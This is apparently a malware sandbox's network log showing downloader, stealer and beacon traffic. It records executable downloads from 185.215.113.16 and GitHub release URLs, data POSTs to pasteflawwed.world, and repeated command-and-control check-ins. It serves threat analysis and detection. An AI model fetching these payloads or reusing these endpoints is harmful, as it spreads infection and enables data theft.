                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IW8%2Bel6eumWiz%2FNxLODXbrL4T1DzLyCULpdhhDxAdyi67afpgTcvQ%2FQPXL1jMlkzjaQPFFjTF4mUxA1v9IPBPT2Cz2vfYFlmTYPpWsqekFSTiyC81qV9oeEx%2BiK2uGY%2BTQBJVE4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1041dbdcdd7d-LHR
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=cGGSzjySwhzeZ67NeZPX2vlmnuWIB2ASWIe4inyTiSo-1740060452-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 46
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:07:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=6ntc6rka742c6uh660r9ue6boe; expires=Fri, 21 Feb 2025 14:07:32 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RH%2FvGzTKe2fAT3zq%2F5EGbO0alU3%2BO6rLPsl%2F3L7%2F%2BmGCgVSPj8DQD9vxhCLhlOA7A2NPIg62PcIuMX%2F2JqCi9E9n4TAa%2BNuUn9vshFQKf%2FTgw%2Brrhi%2By1v4l0fhs3Kc%2FnVy0Lg%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10420c6bdd7d-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22549&min_rtt=21200&rtt_var=3062&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8134&recv_bytes=1060&delivery_rate=352254&cwnd=257&unsent_bytes=0&cid=5d054bdcef06dc04&ts=296&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=M5B3Q6A1Z4VJYO8S
                                                            Cookie: __cf_mw_byp=cGGSzjySwhzeZ67NeZPX2vlmnuWIB2ASWIe4inyTiSo-1740060452-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1510
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:07:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=ei8nthn081ckj7iuf67a5si3ge; expires=Fri, 21 Feb 2025 14:07:33 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzLaE4R8q%2BHTj2pcljjFIYXMrHNrYiUMm0SESGxbK1Db1crqg3LSTbIvJIXBV9nIQNy8kt1k%2FdogMq2arFv7o6hC4Jk523GUr0sLtezDucdWIRUUpYlfMhYMfop2VDr7opLPNZM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10474bf9dd7d-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22443&min_rtt=21200&rtt_var=2508&sent=17&recv=16&lost=0&retrans=0&sent_bytes=9328&recv_bytes=3006&delivery_rate=352254&cwnd=257&unsent_bytes=0&cid=5d054bdcef06dc04&ts=1067&x=0"
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/testdef/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /testdef/random.exe HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:30 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 961024
                                                            Last-Modified: Thu, 20 Feb 2025 13:31:20 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72ea8-eaa00"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/test/am_no.bat
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /test/am_no.bat HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:33 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2086
                                                            Last-Modified: Wed, 22 Jan 2025 23:08:37 GMT
                                                            Connection: keep-alive
                                                            ETag: "67917a75-826"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/test/amnew.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /test/amnew.exe HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:45 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 439296
                                                            Last-Modified: Thu, 30 Jan 2025 18:34:28 GMT
                                                            Connection: keep-alive
                                                            ETag: "679bc634-6b400"
                                                            Accept-Ranges: bytes
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=7VQCB0YLGMRB
                                                            Cookie: __cf_mw_byp=cGGSzjySwhzeZ67NeZPX2vlmnuWIB2ASWIe4inyTiSo-1740060452-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1074
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:07:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=21l18m5hne64n2ubhpk6rk1ph9; expires=Fri, 21 Feb 2025 14:07:33 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4UOngJGJscyNnaNUoEPRbG%2BqG%2Bq2yaaKAEGo9eXITIao2TrzVSHXco9AkmltGi5M4gTacxEVdJfkrKV2wVzF4n1d%2Bf9Fw6uGfkDCpTziijUynMkTAHMB2PHb3LBRymtgAsc7gOo%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f104b5bc1ede7-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21483&min_rtt=20535&rtt_var=6888&sent=7&recv=7&lost=0&retrans=1&sent_bytes=2920&recv_bytes=1770&delivery_rate=167008&cwnd=253&unsent_bytes=0&cid=bab0393a2a48f7a5&ts=412&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=cGGSzjySwhzeZ67NeZPX2vlmnuWIB2ASWIe4inyTiSo-1740060452-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 80
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:07:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=o515j6t1cuoj0bcq1ufnkmhpi2; expires=Fri, 21 Feb 2025 14:07:34 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ugcytvOEo70zZ9j52dYhkjOcd4PKM0Pi4bj8WAQqjWBxACiXDADOZeQyDtpn%2Bhx3G0sfy%2Bqnz1JNiPCj63h70UWdyRul3iX5VrRrhdl6jlOVGQFAnN9JEU%2BaB%2FlwfWvJt9cjno%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f104d2f56fcfd-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22257&min_rtt=21222&rtt_var=6279&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=762&delivery_rate=161023&cwnd=253&unsent_bytes=0&cid=b6a81aa0585e52cc&ts=315&x=0"
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/defend/random.exe
                                                            powershell.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /defend/random.exe HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Connection: Keep-Alive
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:34 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 1797632
                                                            Last-Modified: Thu, 20 Feb 2025 13:31:57 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72ecd-1b6e00"
                                                            Accept-Ranges: bytes
                                                          • flag-us
                                                            DNS
                                                            fv-dev.innocreed.com
                                                            ScreenConnect.ClientService.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            fv-dev.innocreed.com
                                                            IN A
                                                            Response
                                                            fv-dev.innocreed.com
                                                            IN A
                                                            45.88.186.185
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/mine/random.exe
                                                            powershell.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /mine/random.exe HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Connection: Keep-Alive
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:41 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2158592
                                                            Last-Modified: Thu, 20 Feb 2025 13:33:20 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72f20-20f000"
                                                            Accept-Ranges: bytes
                                                          • flag-us
                                                            DNS
                                                            ecozessentials.com
                                                            f29907a492.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            ecozessentials.com
                                                            IN A
                                                            Response
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 4
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 156
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 32
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 32
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 32
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 32
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 32
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 32
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 32
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.209/Di0Her478/index.php
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.209:80
                                                            Request
                                                            POST /Di0Her478/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.209
                                                            Content-Length: 32
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-us
                                                            DNS
                                                            friendseforever.help
                                                            DTQCxXZ.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            friendseforever.help
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            shiningrstars.help
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            shiningrstars.help
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            mercharena.biz
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            mercharena.biz
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            github.com
                                                            futors.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            github.com
                                                            IN A
                                                            Response
                                                            github.com
                                                            IN A
                                                            20.26.156.215
                                                          • flag-gb
                                                            GET
                                                            https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe
                                                            futors.exe
                                                            Remote address:
                                                            20.26.156.215:443
                                                            Request
                                                            GET /legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe HTTP/1.1
                                                            Host: github.com
                                                            Response
                                                            HTTP/1.1 302 Found
                                                            Server: GitHub.com
                                                            Date: Thu, 20 Feb 2025 14:06:05 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                            Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/931090743/fe2351f3-d512-4704-a31e-e7267ddf3e14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T140605Z&X-Amz-Expires=300&X-Amz-Signature=a375807d3acd6f46cceb64985a18e96ee43d6188182be3c777505db1380227a4&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtrano1221.exe&response-content-type=application%2Foctet-stream
                                                            Cache-Control: no-cache
                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                            X-Frame-Options: deny
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 0
                                                            Referrer-Policy: no-referrer-when-downgrade
                                                            Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                            Content-Length: 0
                                                            X-GitHub-Request-Id: D5DD:7439D:212B10:2707F0:67B7373A
                                                          • flag-gb
                                                            GET
                                                            https://github.com/legendary99999/fdsfsdfdsfds/releases/download/dfsfdsfdsdsf/con12312211221.exe
                                                            futors.exe
                                                            Remote address:
                                                            20.26.156.215:443
                                                            Request
                                                            GET /legendary99999/fdsfsdfdsfds/releases/download/dfsfdsfdsdsf/con12312211221.exe HTTP/1.1
                                                            Host: github.com
                                                            Response
                                                            HTTP/1.1 302 Found
                                                            Server: GitHub.com
                                                            Date: Thu, 20 Feb 2025 14:06:12 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                            Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/932430920/f3727065-e97b-4230-9333-63b156bde389?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T140612Z&X-Amz-Expires=300&X-Amz-Signature=d1cd90c7fa89d3e9111a3f715326a60a3b14521e9c6529a8002a73615bdf7c1d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dcon12312211221.exe&response-content-type=application%2Foctet-stream
                                                            Cache-Control: no-cache
                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                            X-Frame-Options: deny
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 0
                                                            Referrer-Policy: no-referrer-when-downgrade
                                                            Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                            Content-Length: 0
                                                            X-GitHub-Request-Id: D5DD:7439D:212E80:270BD1:67B7373B
                                                          • flag-gb
                                                            GET
                                                            https://github.com/legendary99999/saffsfsd/releases/download/dsffdssff/12321321.exe
                                                            futors.exe
                                                            Remote address:
                                                            20.26.156.215:443
                                                            Request
                                                            GET /legendary99999/saffsfsd/releases/download/dsffdssff/12321321.exe HTTP/1.1
                                                            Host: github.com
                                                            Response
                                                            HTTP/1.1 302 Found
                                                            Server: GitHub.com
                                                            Date: Thu, 20 Feb 2025 14:06:21 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
